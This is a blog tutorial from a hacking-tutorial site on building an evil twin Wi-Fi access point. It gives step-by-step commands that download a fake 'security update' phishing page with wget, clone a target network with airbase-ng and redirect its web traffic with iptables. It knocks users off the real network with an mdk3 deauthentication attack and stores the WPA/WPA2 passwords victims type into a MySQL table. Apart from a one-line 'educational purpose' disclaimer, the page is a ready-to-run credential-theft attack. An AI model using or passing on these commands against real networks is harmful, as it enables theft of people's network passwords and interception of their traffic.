<body class="post-template-default single single-post postid-4219 single-format-standard custom-background pmpro-body-has-access custom-header header-full-width content-sidebar boxed header-image" itemscope="" itemtype="http://schema.org/WebPage"><div class="site-container"><header class="site-header" itemscope="" itemtype="http://schema.org/WPHeader"><div class="wrap"><div class="title-area"><a href="https://www.hackingloops.com/" title="Learn Ethical Hacking and Penetration Testing Online"><img src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/1.jpg" alt="Learn Ethical Hacking and Penetration Testing Online" title="Learn Ethical Hacking and Penetration Testing Online" id="rlogo" width="1080" height="250"></a><p class="site-title" itemprop="headline"><a href="https://www.hackingloops.com/" title="Learn Ethical Hacking and Penetration Testing Online">Learn Ethical Hacking and Penetration Testing Online</a></p><p class="site-description" itemprop="description">Learn
ethical hacking, penetration testing, cyber security, best security and
web penetration testing techniques from best ethical hackers in
security field.</p></div></div></header><div class="flex-mobile-menu" id="flex-mobile-menu">Menu <span class="dashicons dashicons-menu alignright open"></span></div>
<div class="site-navigation"><div class="wrap"><nav class="nav-primary" itemscope="" itemtype="http://schema.org/SiteNavigationElement"><ul id="menu-hackingloops-main-menu" class="menu genesis-nav-menu menu-primary responsive-menu"><li id="menu-item-5414" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-5414"><a title="Learn Ethical hacking and Penetration testing online" href="https://www.hackingloops.com/" itemprop="url"><span itemprop="name">Home</span></a></li>
<li id="menu-item-6664" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6664"><a href="https://www.hackingloops.com/category/practice-tests/" itemprop="url"><span itemprop="name">Practice Tests</span></a>
<button class="sub-menu-toggle" role="button"></button><ul class="sub-menu">
<li id="menu-item-5450" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5450"><a title="Ethical Hacking Quiz" href="https://www.hackingloops.com/category/ceh-practice-tests/" itemprop="url"><span itemprop="name">CEH Practice Tests</span></a></li>
</ul>
</li>
<li id="menu-item-6665" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-6665"><a href="https://www.hackingloops.com/category/featured/" itemprop="url"><span itemprop="name">Featured Posts</span></a></li>
<li id="menu-item-5885" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-5885"><a href="https://www.hackingloops.com/category/penetration-testing/" itemprop="url"><span itemprop="name">Penetration Testing</span></a>
<button class="sub-menu-toggle" role="button"></button><ul class="sub-menu">
<li id="menu-item-5437" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5437"><a title="Web Application Penetration Testing" href="https://www.hackingloops.com/category/web-application-penetration-testing/" itemprop="url"><span itemprop="name">Web Application Penetration Testing</span></a></li>
<li id="menu-item-5435" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5435"><a title="Penetration Testing Tools" href="https://www.hackingloops.com/category/penetration-testing-tools/" itemprop="url"><span itemprop="name">Penetration Testing Tools</span></a>
<button class="sub-menu-toggle" role="button"></button><ul class="sub-menu">
<li id="menu-item-5436" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5436"><a title="Open Source Penetration Testing Tools" href="https://www.hackingloops.com/category/open-source-penetration-testing-tools/" itemprop="url"><span itemprop="name">Open Source Penetration Testing Tools</span></a></li>
</ul>
</li>
<li id="menu-item-5438" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5438"><a title="Website Penetration Testing" href="https://www.hackingloops.com/category/web-penetration-testing/" itemprop="url"><span itemprop="name">Website Penetration Testing</span></a>
<button class="sub-menu-toggle" role="button"></button><ul class="sub-menu">
<li id="menu-item-5428" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5428"><a title="SQL Injection Tutorials" href="https://www.hackingloops.com/category/sql-injection/" itemprop="url"><span itemprop="name">SQL Injection</span></a></li>
<li id="menu-item-5417" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5417"><a title="XSS Tutorials" href="https://www.hackingloops.com/category/cross-site-scripting/" itemprop="url"><span itemprop="name">Cross Site Scripting</span></a></li>
<li id="menu-item-5425" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5425"><a title="Session Hijacking Tutorials" href="https://www.hackingloops.com/category/session-hijacking/" itemprop="url"><span itemprop="name">Session Hijacking</span></a></li>
<li id="menu-item-5419" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5419"><a title="Denial of Service Attacks" href="https://www.hackingloops.com/category/ddos/" itemprop="url"><span itemprop="name">DDOS</span></a></li>
</ul>
</li>
<li id="menu-item-5433" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5433"><a title="Firewall Penetration Testing" href="https://www.hackingloops.com/category/penetration-testing/firewall-penetration-testing/" itemprop="url"><span itemprop="name">Firewall Penetration Testing</span></a></li>
<li id="menu-item-5439" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-5439"><a title="Wireless Penetration Testing" href="https://www.hackingloops.com/category/wireless-pen-testing/" itemprop="url"><span itemprop="name">Wireless Penetration Testing</span></a></li>
<li id="menu-item-5434" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-5434"><a title="Network Penetration Testing" href="https://www.hackingloops.com/category/network-penetration-testing/" itemprop="url"><span itemprop="name">Network Penetration Testing</span></a></li>
</ul>
</li>
<li id="menu-item-5416" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5416"><a title="Ethical Hacking Tutorials" href="https://www.hackingloops.com/category/ethical-hacking/" itemprop="url"><span itemprop="name">Ethical Hacking</span></a>
<button class="sub-menu-toggle" role="button"></button><ul class="sub-menu">
<li id="menu-item-5421" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5421"><a title="Information Gathering" href="https://www.hackingloops.com/category/information-gathering/" itemprop="url"><span itemprop="name">Information Gathering</span></a></li>
<li id="menu-item-5424" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5424"><a title="Scanning Tutorials" href="https://www.hackingloops.com/category/scanning/" itemprop="url"><span itemprop="name">Scanning</span></a></li>
<li id="menu-item-5430" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5430"><a title="Vulnerability Enumeration" href="https://www.hackingloops.com/category/vulnerability-database/" itemprop="url"><span itemprop="name">Vulnerability Database</span></a></li>
<li id="menu-item-5427" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5427"><a title="Social Engineering Tutorials" href="https://www.hackingloops.com/category/social-engineering/" itemprop="url"><span itemprop="name">Social Engineering</span></a></li>
<li id="menu-item-5418" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5418"><a title="Cryptography Tutorials" href="https://www.hackingloops.com/category/cryptography/" itemprop="url"><span itemprop="name">Cryptography</span></a></li>
<li id="menu-item-5429" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5429"><a title="System Hacking Tutorials" href="https://www.hackingloops.com/category/system-hacking/" itemprop="url"><span itemprop="name">System Hacking</span></a>
<button class="sub-menu-toggle" role="button"></button><ul class="sub-menu">
<li id="menu-item-5440" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5440"><a title="Windows Hacking" href="https://www.hackingloops.com/category/windows-hacking/" itemprop="url"><span itemprop="name">Windows Hacking</span></a></li>
</ul>
</li>
<li id="menu-item-5422" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5422"><a title="Malware" href="https://www.hackingloops.com/category/malware/" itemprop="url"><span itemprop="name">Malware</span></a></li>
<li id="menu-item-5423" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5423"><a title="Reverse code engineering" href="https://www.hackingloops.com/category/reverse-engineering/" itemprop="url"><span itemprop="name">Reverse Engineering</span></a></li>
<li id="menu-item-5420" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5420"><a title="Ethical hacking tools" href="https://www.hackingloops.com/category/hack-tools/" itemprop="url"><span itemprop="name">Hack Tools</span></a></li>
<li id="menu-item-5431" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-5431"><a title="Wireless Hacking" href="https://www.hackingloops.com/category/wireless-hacking/" itemprop="url"><span itemprop="name">Wireless Hacking</span></a>
<button class="sub-menu-toggle" role="button"></button><ul class="sub-menu">
<li id="menu-item-5426" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5426"><a title="Network Sniffing Tutorials" href="https://www.hackingloops.com/category/sniffing/" itemprop="url"><span itemprop="name">Sniffing</span></a></li>
</ul>
</li>
</ul>
</li>
<li id="menu-item-5444" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5444"><a title="Mobile Hacking" href="https://www.hackingloops.com/category/mobile-hacking/" itemprop="url"><span itemprop="name">Mobile Hacking</span></a>
<button class="sub-menu-toggle" role="button"></button><ul class="sub-menu">
<li id="menu-item-5445" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5445"><a title="Android Hacking" href="https://www.hackingloops.com/category/android-tips/" itemprop="url"><span itemprop="name">Android Hacking</span></a></li>
<li id="menu-item-5446" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5446"><a title="Iphone Hacks" href="https://www.hackingloops.com/category/iphone-hacks/" itemprop="url"><span itemprop="name">Iphone Hacks</span></a></li>
<li id="menu-item-5447" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5447"><a title="Windows Mobile Hacking" href="https://www.hackingloops.com/category/windows-mobile-hacking/" itemprop="url"><span itemprop="name">Windows Mobile Hacking</span></a></li>
</ul>
</li>
<li id="menu-item-6751" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6751"><a href="https://www.hackingloops.com/about/" itemprop="url"><span itemprop="name">About</span></a></li>
<li id="menu-item-8656" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8656"><a href="https://members.hackingloops.com/penetration-testing-academy/" itemprop="url"><span itemprop="name">Join Today</span></a></li>
<li id="menu-item-8189" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8189"><a href="https://members.hackingloops.com/wp-login.php" itemprop="url"><span itemprop="name">Login</span></a></li>
</ul></nav></div></div><div class="site-inner"><div class="wrap"><div class="content-sidebar-wrap"><main class="content"><article class="post-4219 post type-post status-publish format-standard has-post-thumbnail category-network-penetration-testing category-penetration-testing category-wireless-hacking category-wireless-pen-testing tag-creating-evil-twin-access-point tag-evil-twin-access-point tag-hacking-class tag-hacking-wifi tag-hacking-wireless-routers tag-tutorial tag-tutorials pmpro-has-access entry" itemscope="" itemtype="http://schema.org/CreativeWork"><header class="entry-header"><h1 class="entry-title" itemprop="headline">How to Create Evil Twin Access Point ?</h1>
</header><div class="entry-content" itemprop="text"><div class="apss-social-share apss-theme-1 clearfix">
<div class="apss-facebook apss-single-icon">
<a rel="nofollow" title="Share on Facebook" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://www.hackingloops.com/create-evil-twin-access-point/">
<div class="apss-icon-block clearfix">
<i class="fa fa-facebook"></i>
<span class="apss-social-text">Share on Facebook</span>
<span class="apss-share">Share</span>
</div>
<div class="count apss-count" data-url="https://www.hackingloops.com/create-evil-twin-access-point/" data-social-network="facebook" data-social-detail="https://www.hackingloops.com/create-evil-twin-access-point/_facebook">0</div>
</a>
</div>
<div class="apss-twitter apss-single-icon">
<a rel="nofollow" href="https://twitter.com/intent/tweet?text=How%20to%20Create%20Evil%20Twin%20Access%20Point%20%3F&url=https%3A%2F%2Fwww.hackingloops.com%2Fcreate-evil-twin-access-point%2F&" title="Share on Twitter" target="_blank">
<div class="apss-icon-block clearfix">
<i class="fa fa-twitter"></i>
<span class="apss-social-text">Share on Twitter</span><span class="apss-share">Tweet</span>
</div>
</a>
</div>
<div class="apss-google-plus apss-single-icon">
<a rel="nofollow" title="Share on Google Plus" target="_blank" href="https://plus.google.com/share?url=https://www.hackingloops.com/create-evil-twin-access-point/">
<div class="apss-icon-block clearfix">
<i class="fa fa-google-plus"></i>
<span class="apss-social-text">Share on Google Plus</span>
<span class="apss-share">Share</span>
</div>
<div class="count apss-count" data-url="https://www.hackingloops.com/create-evil-twin-access-point/" data-social-network="google-plus" data-social-detail="https://www.hackingloops.com/create-evil-twin-access-point/_google-plus">0</div>
</a>
</div>
<div class="apss-pinterest apss-single-icon">
<a rel="nofollow" title="Share on Pinterest" href="javascript:pinIt();">
<div class="apss-icon-block clearfix">
<i class="fa fa-pinterest"></i>
<span class="apss-social-text">Share on Pinterest</span>
<span class="apss-share">Share</span>
</div>
<div class="count apss-count" data-url="https://www.hackingloops.com/create-evil-twin-access-point/" data-social-network="pinterest" data-social-detail="https://www.hackingloops.com/create-evil-twin-access-point/_pinterest">0</div>
</a>
</div>
<div class="apss-linkedin apss-single-icon">
<a rel="nofollow" title="Share on LinkedIn" target="_blank" href="http://www.linkedin.com/shareArticle?mini=true&title=How%20to%20Create%20Evil%20Twin%20Access%20Point%20%3F&url=https://www.hackingloops.com/create-evil-twin-access-point/&summary=How+to+create+Evil+twin+access+point%3F+But+first+of+all+what+is+Evil+twin+access+point%3F%3F%C2%A0An+evil+twi...">
<div class="apss-icon-block clearfix"><i class="fa fa-linkedin"></i>
<span class="apss-social-text">Share on LinkedIn</span>
<span class="apss-share">Share</span>
</div>
<div class="count apss-count" data-url="https://www.hackingloops.com/create-evil-twin-access-point/" data-social-network="linkedin" data-social-detail="https://www.hackingloops.com/create-evil-twin-access-point/_linkedin">0</div>
</a>
</div>
<div class="apss-total-share-count">
<span class="apss-count-number">0</span>
<div class="apss-total-shares"><span class="apss-total-text"> Total</span>
<span class="apss-shares-text"> Shares</span></div>
</div>
</div><div class="mailmunch-forms-before-post" style="display: none !important;"></div><p>How to create <strong>Evil twin access point</strong>? But first of all what is <strong>Evil twin access point</strong>?? An
evil twin, in security, is a rogue wireless access point that
masquerades as a Wi-Fi access point so that an attacker can
gather personal information without the user’s knowledge. Simply you can
call it as <strong>Phishing attack on Wifi Routers</strong> :P.</p>
<p>To the user, the evil twin looks like a hotspot with a strong signal;
that’s because the attacker has not only used the same network name and
settings as the “good twin” he is impersonating, he has also physically
positioned himself near the end-user so that his signal is likely to be
the strongest within range.</p>
<p>If the end-user is tempted by the strong signal and connects manually
to the evil twin to access the Internet, or if the user’s computer
automatically chooses that connection because it is running
in promiscuous mode, the evil twin becomes the user’s Internet
access point, giving the attacker the ability to intercept sensitive
data such as passwords.</p>
<p>So let’s get started with the tutorial for creating an evil twin access point..</p>
<p><strong>Step 1:</strong></p>
<p>Login to your kali linux machine..</p>
<p>Establish an internet connection to your host machine..</p>
<p>Now we have to install DHCP server as follows..</p>
<p>Open the <strong>terminal</strong> and type <strong>apt-get install dhcp3-server</strong>as show below:</p>
<p><img class="size-full wp-image-4250 aligncenter" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Creating-Evil-Twin-Access-Point-Screenshot-1.jpg" alt="Creating Evil Twin Access Point - Screenshot 1" srcset="https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-1.jpg 1279w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-1-300x157.jpg 300w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-1-1024x536.jpg 1024w" sizes="(max-width: 1279px) 100vw, 1279px" width="1279" height="669"></p>
<p>In the above screenshot I have already installed the dhcp server..</p>
<p><strong>Step 2:</strong></p>
<p>Now we need to configure our DHCP server as below..</p>
<p>Open your<strong> terminal</strong> and type <strong>nano/etc/dhcpd.conf, </strong>you should have a blank file opened up on your terminal..</p>
<p>Now type the following shown on the screen shot below</p>
<p><img class="size-full wp-image-4251 aligncenter" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Creating-Evil-Twin-Access-Point-Screenshot-2.jpg" alt="Creating Evil Twin Access Point - Screenshot 2" srcset="https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-2.jpg 1279w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-2-300x157.jpg 300w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-2-1024x536.jpg 1024w" sizes="(max-width: 1279px) 100vw, 1279px" width="1279" height="669"></p>
<p>After typing press <strong>ctrl+x</strong> and then <strong>press y</strong> and hit <strong>enter</strong> to save it.</p>
<p><strong>Step 3:</strong></p>
<p>Now download the security update page which the client will see when they open up the web browser..</p>
<p>To do that,</p>
<p>Navigate to, <strong>cd /var/www</strong> in ur terminal and do as follows:</p>
<p style="padding-left: 30px;"><strong>rm index.html</strong></p>
<p style="padding-left: 30px;"><strong>wget http://hackthistv.com/eviltwin.zip</strong></p>
<p style="padding-left: 30px;"><strong>unzip eviltwin.zip</strong></p>
<p style="padding-left: 30px;"><strong>rm eviltwin.zip</strong></p>
<p><img class="size-full wp-image-4252 aligncenter" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Creating-Evil-Twin-Access-Point-Screenshot-3.jpg" alt="Creating Evil Twin Access Point - Screenshot 3" srcset="https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-3.jpg 1279w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-3-300x157.jpg 300w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-3-1024x536.jpg 1024w" sizes="(max-width: 1279px) 100vw, 1279px" width="1279" height="669"></p>
<p><strong>Step 4:</strong></p>
<p>Now type the following to start your apache server and mysql:</p>
<p style="padding-left: 30px;"><strong> /etc/init.d/apache2 start</strong></p>
<p style="padding-left: 30px;"><strong>/etc/init.d/mysql start</strong></p>
<p><img class="size-full wp-image-4253 aligncenter" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Creating-Evil-Twin-Access-Point-Screenshot-4.jpg" alt="Creating Evil Twin Access Point - Screenshot 4" srcset="https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-4.jpg 1279w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-4-300x157.jpg 300w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-4-1024x536.jpg 1024w" sizes="(max-width: 1279px) 100vw, 1279px" width="1279" height="669"></p>
<p>Now the mysql is loaded now we have to create a database where we
store the WPA/WPA2 password that the client enters into the security
update page..</p>
<p> </p>
<p>Type thefollows:</p>
<p style="padding-left: 30px;"><strong>mysql -u root</strong></p>
<p style="padding-left: 30px;"><strong> create database evil_twin;</strong></p>
<p style="padding-left: 30px;"><strong> use evil_twin</strong></p>
<p style="padding-left: 30px;"><strong> create table wpa_keys(password varchar(64), confirm varchar(64));</strong></p>
<p><img class="size-full wp-image-4254 aligncenter" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Creating-Evil-Twin-Access-Point-Screenshot-5.jpg" alt="Creating Evil Twin Access Point - Screenshot 5" srcset="https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-5.jpg 1279w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-5-300x157.jpg 300w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-5-1024x536.jpg 1024w" sizes="(max-width: 1279px) 100vw, 1279px" width="1279" height="669"></p>
<p>In the above screenshot the databse already exists..</p>
<p>Leave the mysql terminal open..</p>
<p> </p>
<p><strong>Step 5:</strong></p>
<p>Now we need to find our local network adapter interface name and our local ip</p>
<p>Now open the new terminal and type:</p>
<p style="padding-left: 30px;"><strong>ip route(take note of local ip n wired interface)</strong></p>
<p style="padding-left: 30px;"><strong>airmon-ng</strong></p>
<p style="padding-left: 30px;"><strong>airmon-ng start wlan0</strong></p><div class="mailmunch-forms-in-post-middle" style="display: none !important;"></div>
<p style="padding-left: 30px;"><strong>clear</strong></p>
<p><img class="size-full wp-image-4255 aligncenter" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Creating-Evil-Twin-Access-Point-Screenshot-6.jpg" alt="Creating Evil Twin Access Point - Screenshot 6" srcset="https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-6.jpg 1279w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-6-300x157.jpg 300w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-6-1024x536.jpg 1024w" sizes="(max-width: 1279px) 100vw, 1279px" width="1279" height="669"></p>
<p>NOTE: <strong>eth0</strong> is my interface name and <strong>192.168.0.105</strong> is my local ip</p>
<p><strong> </strong></p>
<p style="padding-left: 30px;"><strong>airodump-ng-oui-update</strong></p>
<p><img class="size-full wp-image-4256 aligncenter" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Creating-Evil-Twin-Access-Point-Screenshot-7.jpg" alt="Creating Evil Twin Access Point - Screenshot 7" srcset="https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-7.jpg 1279w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-7-300x157.jpg 300w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-7-1024x536.jpg 1024w" sizes="(max-width: 1279px) 100vw, 1279px" width="1279" height="669"></p>
<p> </p>
<p style="padding-left: 30px;"><strong>airodump-ng -M mon0 (take note of target essid,bssid and channel number)</strong></p>
<p style="padding-left: 30px;"><strong>airbase-ng -e [ESSID] -c [ch. #] -P mon0</strong></p>
<p style="padding-left: 30px;"><strong>NOTE: [ESSID] is your targets ESSID and [ch. #] targets channel no.</strong></p>
<p><img class="size-full wp-image-4257 aligncenter" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Creating-Evil-Twin-Access-Point-Screenshot-8.jpg" alt="Creating Evil Twin Access Point - Screenshot 8" srcset="https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-8.jpg 1279w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-8-300x157.jpg 300w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-8-1024x536.jpg 1024w" sizes="(max-width: 1279px) 100vw, 1279px" width="1279" height="669"></p>
<p><strong>Step 6:</strong></p>
<p>Our evil twin access point is now up and running, we need to
configure our tunnel interface so we can create a bridge between our
evil twin access point and our wired interface and our tunnel interface
is named <strong>at0, </strong>which was created whenwe created evil twin access point using airbase..</p>
<p>Don’t close airbase and mysql terminal..</p>
<p>Now open a new terminal and type as follows:</p>
<p style="padding-left: 30px;"><strong>ifconfig at0 192.168.1.129 netmask 255.255.255.128</strong></p>
<p>now we need to add a routing table to enable IP forwarding so we can
forward traffic to and fro from our evil twin access point..</p>
<p>so,type the following:</p>
<p style="padding-left: 30px;"><strong>route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129</strong></p>
<p style="padding-left: 30px;"><strong>echo 1 > /proc/sys/net/ipv4/ip_forward</strong></p>
<p style="padding-left: 30px;"><strong>iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE</strong></p>
<p style="padding-left: 30px;"><strong>iptables –append FORWARD –in-interface at0 -j ACCEPT</strong></p>
<p style="padding-left: 30px;"><strong>iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]</strong></p>
<p style="padding-left: 30px;"><strong>iptables -t nat -A POSTROUTING -j MASQUERADE</strong></p>
<p style="padding-left: 30px;"><strong>dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0</strong></p>
<p style="padding-left: 30px;"><strong>etc/init.d/isc-dhcp-server start</strong></p>
<p><img class="size-full wp-image-4258 aligncenter" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Creating-Evil-Twin-Access-Point-Screenshot-9.jpg" alt="Creating Evil Twin Access Point - Screenshot 9" srcset="https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-9.jpg 1279w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-9-300x157.jpg 300w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-9-1024x536.jpg 1024w" sizes="(max-width: 1279px) 100vw, 1279px" width="1279" height="669"></p>
<p><strong>Step 7:</strong></p>
<p>Now we need to force our clients to connect to our evil twin access
point and to accomplish this we need to disconnect the clients by
performing the de-authentication attack. To do that first we need to
create the <strong>blacklist file</strong>that contains BSSID of the target..</p>
<p>Do as follows :</p>
<p style="padding-left: 30px;"><strong>echo [BSSID] > blacklist</strong></p>
<p style="padding-left: 30px;"><strong>NOTE:[BSSID] BSSID of the target </strong></p>
<p style="padding-left: 30px;"><strong>mdk3 mon0 d -b blacklist -c [CH.#]</strong></p>
<p><img class="size-full wp-image-4259 aligncenter" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Creating-Evil-Twin-Access-Point-Screenshot-10.jpg" alt="Creating Evil Twin Access Point - Screenshot 10" srcset="https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-10.jpg 1279w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-10-300x157.jpg 300w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-10-1024x536.jpg 1024w" sizes="(max-width: 1279px) 100vw, 1279px" width="1279" height="669"></p>
<p>Now go back to airbase terminal to check if any client has connected to your evil twin access point..</p>
<p>If he is connected to the evil twin access point he will see the security page as shown below which asks for password..</p>
<p><img class="size-full wp-image-4260 aligncenter" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Creating-Evil-Twin-Access-Point-Screenshot-11.png" alt="Creating Evil Twin Access Point - Screenshot 11" srcset="https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-11.png 1230w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-11-300x179.png 300w, https://www.hackingloops.com/wp-content/uploads/2015/10/Creating-Evil-Twin-Access-Point-Screenshot-11-1024x611.png 1024w" sizes="(max-width: 1230px) 100vw, 1230px" width="1230" height="734"></p>
<p>Where the client enters his WPA/WPA2 password and clicks on update.</p>
<p> </p>
<p>Now go over to the <strong>mysql terminal</strong> and type</p>
<p style="padding-left: 30px;"><strong>use evil_twin</strong></p>
<p style="padding-left: 30px;"><strong>select * from wpa_keys; {To view the password entered by the victim in our mysql database}</strong></p>
<p><strong> </strong></p>
<p>So that’s it, that’s how you create an evil twin access point..</p>
<p>Note : This tutorial is only for educational purpose!! Please read Disclaimer.</p>
<p>Thank you!!</p>
<p>Article by: Kartik Durg [J-BOY]</p>
<div class="mailmunch-forms-after-post" style="display: none !important;"></div></div><footer class="entry-footer"><p class="entry-meta"><span class="entry-categories">Filed Under: <a href="https://www.hackingloops.com/category/network-penetration-testing/" rel="category tag">Network Penetration Testing</a>, <a href="https://www.hackingloops.com/category/penetration-testing/" rel="category tag">Penetration Testing</a>, <a href="https://www.hackingloops.com/category/wireless-hacking/" rel="category tag">Wireless Hacking</a>, <a href="https://www.hackingloops.com/category/wireless-pen-testing/" rel="category tag">Wireless Penetration Testing</a></span> <span class="entry-tags">Tagged With: <a href="https://www.hackingloops.com/tag/creating-evil-twin-access-point/" rel="tag">Creating Evil Twin Access Point</a>, <a href="https://www.hackingloops.com/tag/evil-twin-access-point/" rel="tag">Evil Twin Access Point</a>, <a href="https://www.hackingloops.com/tag/hacking-class/" rel="tag">Hacking School</a>, <a href="https://www.hackingloops.com/tag/hacking-wifi/" rel="tag">Hacking Wifi</a>, <a href="https://www.hackingloops.com/tag/hacking-wireless-routers/" rel="tag">Hacking Wireless Routers</a>, <a href="https://www.hackingloops.com/tag/tutorial/" rel="tag">Tutorial</a>, <a href="https://www.hackingloops.com/tag/tutorials/" rel="tag">Tutorials</a></span></p></footer></article><div class="adjacent-entry-pagination pagination"><div class="pagination-previous alignleft"><span class="dashicons dashicons-arrow-left-alt2"></span> Previous Post<br><a href="https://www.hackingloops.com/windows10-godmode/" rel="prev">Unlock Hidden Features of Windows 10 God Mode</a></div><div class="pagination-next alignright">Next Post <span class="dashicons dashicons-arrow-right-alt2"></span><br><a href="https://www.hackingloops.com/10-ways-secure-online-accounts-computer/" rel="next">10 ways to secure your online accounts and Computer</a></div></div><div class="after-entry widget-area"><section id="text-7" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><div class="cta"><div class="shadow"><h2>Did you enjoy this post?</h2>Would you like to join our Insider's List and be notified when we post something or get FREE exclusive content?<br><br><a href="https://howtohackin.leadpages.net/leadbox/14527a873f72a2%3A11a2b804c346dc/5730827476402176/" class="button">Join Our Insider's List</a></div></div></div>
</div></section>
</div><div class="entry-comments" id="comments"><h3>Comments</h3><ol class="comment-list">
<li class="comment even thread-even depth-1" id="comment-20283">
<article itemprop="comment" itemscope="" itemtype="http://schema.org/Comment">
<header class="comment-header">
<p class="comment-author" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
